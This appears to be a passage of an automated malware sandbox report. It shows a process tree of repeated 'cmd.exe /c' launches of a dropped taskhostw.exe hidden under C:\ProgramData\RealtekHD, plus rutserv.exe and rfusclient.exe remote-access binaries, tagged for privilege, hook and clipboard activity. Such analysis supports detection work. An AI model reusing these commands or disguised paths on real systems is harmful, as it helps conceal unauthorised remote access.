                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:3036
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                    PID:3408
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:952
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                      PID:4936
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:1096
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                        PID:3540
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:4564
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                          C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5480
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4688
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                            PID:5052
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:1864
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                              PID:4024
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:5024
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                PID:2424
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:4724
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2952
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5252
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2416
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3952
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1592
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1716
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1128
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:404
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2728
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4556
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2520
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2964
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5852
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\Windows\rfusclient.exe /tray
                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3740
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            C:\ProgramData\Windows\rfusclient.exe /tray
                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2996
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2340
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1128
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1224
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5328
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4216
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4424
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5848
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5212
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6096
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5104
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3008
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5748
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5352
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Programdata\RealtekHD\taskhostw.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5428
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2424
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5444
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1700
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1096
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5412
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1224
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5328
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2640
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4496
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5408
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4740
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1084
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6076
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4260
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1856
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2856
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2036
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3256
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\ProgramData\Windows\rfusclient.exe /tray
                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1968
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5576
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1592
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5928
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5880
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3760
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3528
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4576
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4980
